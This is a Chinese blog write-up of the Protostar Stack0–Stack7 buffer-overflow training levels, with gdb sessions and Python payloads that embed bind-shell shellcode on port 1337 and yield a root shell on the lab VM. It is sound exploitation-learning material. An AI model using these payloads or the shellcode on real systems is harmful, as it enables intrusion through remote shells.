Protostar Stack Write Up

原創 jchalex 2018-09-03 08:02

Protostar Stack0

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  modified = 0;
  gets(buffer);

  if(modified != 0) {
      printf("you have changed the 'modified' variable\n");
  } else {
      printf("Try again?\n");
  }
}

思路:buffer溢出改變modified的值

$ echo `python -c "print 'A'*68"` | /opt/protostar/bin/stack0
you have changed the 'modified' variable

Protostar Stack1

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  if(argc == 1) {
      errx(1, "please specify an argument\n");
  }

  modified = 0;
  strcpy(buffer, argv[1]);

  if(modified == 0x61626364) {
      printf("you have correctly got the variable to the right value\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }
}

思路:buffer溢出改變modified的值爲0x61626364

$ /opt/protostar/bin/stack1 `python -c "print 'A'*64+'\x64\x63\x62\x61'"`
you have correctly got the variable to the right value

Protostar Stack2

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];
  char *variable;

  variable = getenv("GREENIE");

  if(variable == NULL) {
      errx(1, "please set the GREENIE environment variable\n");
  }

  modified = 0;

  strcpy(buffer, variable);

  if(modified == 0x0d0a0d0a) {
      printf("you have correctly modified the variable\n");
  } else {
      printf("Try again, you got 0x%08x\n", modified);
  }

}

思路:buffer溢出改變modified的值爲0x0d0a0d0a,而buffer是從環境變量GREENIE複製過來的,所以設置一下該環境變量就好。

$ export GREENIE=`python -c "print 'A'*64+'\x0a\x0d\x0a\x0d'"`
$ ./stack2 
you have correctly modified the variable

這是在自己本地的Ubuntu 16.04下的執行結果

但在protostar虛擬機裏,執行失敗

$ export GREENIE=`python -c "print 'A'*64+'\x0a\x0d\x0a\x0d'"`
: bad variable name

不給設置這樣的變量名

不服,寫個腳本試試

import os

os.environ['GREENIE'] = 'A'*64+'\x0a\x0d\x0a\x0d'
os.system('./stack2')
$ python se.py 
you have correctly modified the variable

OK

Protostar Stack3

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
  printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
  volatile int (*fp)();
  char buffer[64];

  fp = 0;

  gets(buffer);

  if(fp) {
      printf("calling function pointer, jumping to 0x%08x\n", fp);
      fp();
  }
}

思路:查安全機制

$ checksec stack3 
[*] '/home/jc/pwn/stack3'
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments

什麼都沒開,那麼只需要反彙編看一下win的地址,利用buffer溢出就好

$ gdb -q stack3
Reading symbols from stack3...done.
gdb-peda$ disassemble win
Dump of assembler code for function win:
   0x08048424 <+0>: push   ebp
   0x08048425 <+1>: mov    ebp,esp
   0x08048427 <+3>: sub    esp,0x18
   0x0804842a <+6>: mov    DWORD PTR [esp],0x8048540
   0x08048431 <+13>:    call   0x8048360 <puts@plt>
   0x08048436 <+18>:    leave  
   0x08048437 <+19>:    ret    
End of assembler dump.

找到win()的地址爲0x08048424,編寫payload過關

$ echo `python -c "print 'A'*64+'\x24\x84\x04\x08'"` | /opt/protostar/bin/stack3
calling function pointer, jumping to 0x08048424
code flow successfully changed

Protostar Stack4

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
  printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
  char buffer[64];

  gets(buffer);
}

代碼真簡潔!
思路:溢出buffer,造成崩潰,找到rip被覆蓋的偏移量,放入win()的地址

$ gdb -q stack4
Reading symbols from stack4...done.
gdb-peda$ pattern_create 138
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAA'
gdb-peda$ r
Starting program: /home/jc/pwn/stack4 
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAA

Program received signal SIGSEGV, Segmentation fault.

EIP: 0x41344141 ('AA4A')
gdb-peda$ pattern_offset AA4A
AA4A found at offset: 76

覆蓋eip的偏移量爲76

gdb-peda$ p win
$3 = {void (void)} 0x80483f4 <win>

win()的地址爲0x80483f4

$ echo `python -c "print 'A'*76+'\xf4\x83\x04\x08'"` | /opt/protostar/bin/stack4
code flow successfully changed
Segmentation fault

Protostar Stack5

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  char buffer[64];

  gets(buffer);
}

思路:檢查安全機制

$ checksec stack5
[*] '/home/jc/pwn/stack5'
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments

什麼也沒開,所以,應該可以控制eip,執行shellcode。找到一個shell_bind_tcp 的shellcode,共89字節,端口號爲1337。

生成長度爲200的測試字符串

$ gdb -q stack5
Reading symbols from stack5...done.
gdb-peda$ pattern_create 200
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA'

運行

gdb-peda$ r
Starting program: /home/jc/pwn/stack5 
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA

Program received signal SIGSEGV, Segmentation fault.

[----------------------------------registers-----------------------------------]
ESP: 0xffffcec0 ("AJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
EIP: 0x41344141 ('AA4A')

eip崩潰在0x41344141(‘AA4A’)

gdb-peda$ pattern_offset AA4A
AA4A found at offset: 76

偏移量爲76

此時esp的地址爲0xffffcec0,也是我們控制eip要轉到的地址,內容爲

AJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA

長度爲120,可以容納89字節的shellcode,還可以在shellcode前執行一段nop指令。構造payload:’A’*76+shellcode地址+shellcode

echo `python -c "print 'A'*76+'\xc0\xce\xff\xff'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | ./stack5
Segmentation fault (core dumped)

Segmentation fault!查看core

gdb -q stack5 core
Reading symbols from stack5...done.
[New LWP 17461]
Core was generated by `./stack5'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0xffffceff in ?? ()

查看0xffffceff附近的存儲情況

gdb-peda$ x/20b 0xffffceff
0xffffceff: 0xff    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffcf07: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffcf0f: 0x90    0x6a    0x66    0x58

我們的shellcode的起始地址是0xffffcf00,而不是0xffffcec0,修改payload

echo `python -c "print 'A'*76+'\x00\xcf\xff\xff'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | ./stack5
Segmentation fault (core dumped)

還是Segmentation fault!再查看core

$ gdb -q stack5 core
Reading symbols from stack5...done.
[New LWP 17571]
Core was generated by `./stack5'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0x90ffffcf in ?? ()

查看附近內存

gdb-peda$ x/20b 0xffffcf00
0xffffcf00: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffcf08: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x6a
0xffffcf10: 0x66    0x58    0x6a    0x1
gdb-peda$ x/20b 0xffffcef8
0xffffcef8: 0x41    0x41    0x41    0x41    0xcf    0xff    0xff    0x90
0xffffcf00: 0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90
0xffffcf08: 0x90    0x90    0x90    0x90

發現我們的設置的返回地址0xffffcf00中的\x00字節不在內存中,悟了!\x00字節發送不了!但是我設了16個字節的nop,返回地址往後移1到16位都行,對吧?就移1位好了,修改返回地址爲0xffffcf01

echo `python -c "print 'A'*76+'\x01\xcf\xff\xff'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | ./stack5
$ nc localhost 1337
whoami
jc

成功!

protostar虛擬機裏的esp的地址:0xbffffcc0

$ echo `python -c "print 'A'*76+'\xc0\xfc\xff\xbf'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | /opt/protostar/bin/stack5
$ nc protostar 1337
whoami
root

protostar虛擬機裏沒有發現gdb與直接運行時esp不一致的問題

Protostar Stack6

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void getpath()
{
  char buffer[64];
  unsigned int ret;

  printf("input path please: "); fflush(stdout);

  gets(buffer);

  ret = __builtin_return_address(0);

  if((ret & 0xbf000000) == 0xbf000000) {
      printf("bzzzt (%p)\n", ret);
      _exit(1);
  }

  printf("got path %s\n", buffer);
}

int main(int argc, char **argv)
{
  getpath();



}

返回地址被限制不能在棧中我們可操作的部分
思路:雖然被限制了,但只是限制了getpath函數的返回地址不能直接返回到shellcode的地址,可以控制指令重新返回到getpath的ret指令的地址,此時只要在棧頂設置好shellcode的地址,就可以繞過限制

$ gdb -q stack6
Reading symbols from stack6...done.
gdb-peda$ pattern_create 200
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA'
gdb-peda$ r
Starting program: /home/jc/pwn/stack6 
input path please: AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA
got path AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAJAAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
ESP: 0xffffceb0 ("fAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
EIP: 0x41414a41 ('AJAA')
gdb-peda$ pattern_offset AJAA
AJAA found at offset: 80

這次getpath()的返回地址偏移量爲80

gdb-peda$ x/s $esp
0xffffceb0: "fAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA"
gdb-peda$ pattern_offset fAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA
fAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA found at offset: 84

棧指針地址爲0xffffceb0,偏移量爲84

構造payload:’A’*80+ret指令地址+ret返回地址(shellcode地址,esp+4)+shellcode

$ echo `python -c "print 'A'*80+'\xf9\x84\x04\x08'+'\xb4\xce\xff\xff'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | ./stack6
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��AAAAAAAAAAAA����������������������jfXj[1�VSj��̀_���fVfh9fS��jQW��̀�f�VW��̀�fCVVW��̀YY���?̀Iy��
                    h//shh/bin��A��̀
Segmentation fault (core dumped)

Segmentation fault!查看core文件

$ gdb -q stack6 core
Reading symbols from stack6...done.
[New LWP 14242]
Core was generated by `./stack6'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0xffffcebd in ?? ()

查一下附近的存儲情況

gdb-peda$ x/100b 0xffffce78
0xffffce78: 0x00    0x70    0xfb    0xf7    0x41    0x41    0x41    0x41
0xffffce80: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffce88: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffce90: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffce98: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffcea0: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffcea8: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffceb0: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffceb8: 0x41    0x41    0x41    0x41    0xf9    0x84    0x04    0x08
0xffffcec0: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xffffcec8: 0x41    0x41    0x41    0x41    0xf9    0x84    0x04    0x08
0xffffced0: 0xb4    0xce    0xff    0xff    0x90    0x90    0x90    0x90
0xffffced8: 0x90    0x90    0x90    0x90
gdb-peda$ p $esp
$2 = (void *) 0xffffced4

發現問題了:我們第二次的返回地址應該是0xffffced4,而不是0xffffceb4

而且在連續存儲64個A之後,出現了有4個A被替換的情況,此處不解,路過的friend懂的希望不吝賜教

修改payload

$ echo `python -c "print 'A'*80+'\xf9\x84\x04\x08'+'\xd4\xce\xff\xff'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | ./stack6
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��AAAAAAAAAAAA����������������������jfXj[1�VSj��̀_���fVfh9fS��jQW��̀�f�VW��̀�fCVVW��̀YY���?̀Iy��
                    h//shh/bin��A��̀

$ nc localhost 1337
whoami
jc

上面是在本機Ubuntu上折騰的結果。在protostar的虛擬機上,同樣棧指針的地址要加32個字節。獲得的esp地址是0xbffffd20,本來+4就是0xbffffd24,但是要再加32個字節變成0xbffffd44纔是正解。

$ echo `python -c "print 'A'*80+'\xf9\x84\x04\x08'+'\x44\xfd\xff\xbf'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | /opt/protostar/bin/stack6
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��AAAAAAAAAAAA��D�������������������jfXj[1�VSj��̀_���fVfh9fS��jQW��̀�f�VW��̀�fCVVW��̀YY���?̀Iy��
                    h//shh/bin��A��̀

$ nc protostar 1337
whoami
root

我嘗試了在gdb裏執行payload,發現gdb裏是不用加32字節的,難道是gdb與系統直接運行的區別?

Protostar Stack7

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

char *getpath()
{
  char buffer[64];
  unsigned int ret;

  printf("input path please: "); fflush(stdout);

  gets(buffer);

  ret = __builtin_return_address(0);

  if((ret & 0xb0000000) == 0xb0000000) {
      printf("bzzzt (%p)\n", ret);
      _exit(1);
  }

  printf("got path %s\n", buffer);
  return strdup(buffer);
}

int main(int argc, char **argv)
{
  getpath();



}

思路:和stack6一樣的解法
ret指令的地址:0x08048544
shellcode的起始地址:0xbffffcd4

$ echo `python -c "print 'A'*80+'\x44\x85\x04\x08'+'\xd4\xfc\xff\xbf'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | /opt/protostar/bin/stack7
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD�AAAAAAAAAAAAD���������������������jfXj[1�VSj��̀_���fVfh9fS��jQW��̀�f�VW��̀�fCVVW��̀YY���?̀Iy��
                    h//shh/bin��A��̀
$ nc protostar 1337
whoami
root

小結

失敗不可怕,可怕的是不去找出失敗的原因。

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

Adobe PDF LibTiff Integer Overflow CVE-2010-0188分析

一,TIFF圖像格式介紹 TIFF文件分爲文件頭IFH和IFD兩部分。 IFH結構見下圖: 共有8字節。其中 0-1 規定爲“II”或“MM”,Intel/Mortorola類型的字節序列 2-3 TIFF版本號,爲向下兼容,值爲42

p0x1307 2020-07-05 19:06:34

論文閱讀:KOOBE: Towards Facilitating Exploit Generation of Kernel Out-Of-Bounds Write Vulnerabilities

Usenix Security 2020 的一篇關於內核OOB漏洞自動化利用的文章,感覺寫的不錯。 文章目錄簡介研究背景研究方法研究假設核心思想實現測試評估總結 簡介 這篇文章的主要目的是爲了評估堆溢出漏洞的可利用性,從而方便

破落之实 2020-07-03 23:25:39

nebula level18

About Analyse the C program, and look for vulnerabilities in the program. There is an easy way to solve this level, an

陈阿福 2020-06-29 11:24:59

Nebula level16

http://www.exploit-exercises.com/nebula/level16 About There is a perl script running on port 1616. To do this level,

陈阿福 2020-06-29 10:40:49

黑客入門之fusion level02

本文轉自下面的鏈接 https://qqp.ca/2013/07/15/fusion-level-02.html 對最後的exploit 中的payload2做了小小的修改,可以得到shell。 Level 02 introduces n

陈阿福 2020-06-29 10:40:48

黑客入門之fusion level01

http://exploit-exercises.com/fusion/level01 About level00 with stack/heap/mmap aslr, without info leak :) Vulnerabilit

陈阿福 2020-06-29 10:40:48

pwnable.kr - fd

題目: 題目鏈接:http://pwnable.kr/play.php ——> 連接登錄: ssh [email protected] -p2222 查看文件及權限: ls -al 看到flag文件,但是當前用戶fd並沒有讀

jchalex 2020-06-29 07:47:26

命令行下修改DEP

bcdedit.exe /set nx OptIn bcdedit.exe /set nx OptOut bcdedit.exe /set nx AlwaysOn bcdedit.exe /set nx AlwaysOff

sam20151111sam 2020-06-27 11:30:46

如何查看程序是否支持ASLR

使用工具PE EXPLOER打開,查看DllCharacteristics是否包含0x40就可以知道是否支持ASLR

sam20151111sam 2020-06-27 11:30:45

Easy RM to Mp3 Converter測試rop的代碼

my $file="rop.m3u"; my $buffersize=26094-20-8-4; my $junk="A"x$buffersize;

sam20151111sam 2020-06-27 11:30:45

合天網安實驗室CTF-Exp200-Come on,Exploit me!

合天網安實驗室CTF-Exp200-Come on,Exploit me! 題目描述   Audrey Tang. ⊙.⊙ 我只能說到這兒了 相關附件   exp200 參考解題步驟 1、下載附件先用VSCode打開看看 換個

皮卡皮卡~ 2020-06-27 04:27:26

WinXP/Win7/Win8通用shellcode

轉自http://hi.baidu.com/egodcore/item/c13e67fe197c940fc6dc45f5 衆所周知,在windows xp時代未啓用ASLR(Address space layout randomizat

SauceJ 2020-06-13 08:31:30

shellcode轉換成彙編代碼

方法1:提取ShellCode中的機器碼---->把機器碼粘貼到WinHEX並保存成exe文件---->用C32Asm反彙編---->得到反彙編碼。 方法2:提取ShellCode中的機器碼---->用OllyDBG隨便打開一個exe程序

SauceJ 2020-06-13 08:31:20

從零開始學Fuzzing系列:瀏覽器挖掘框架Morph誕生記

lanceleo 2020-06-02 06:37:28

PE文件基址重定位

SauceJ 2020-02-26 01:27:20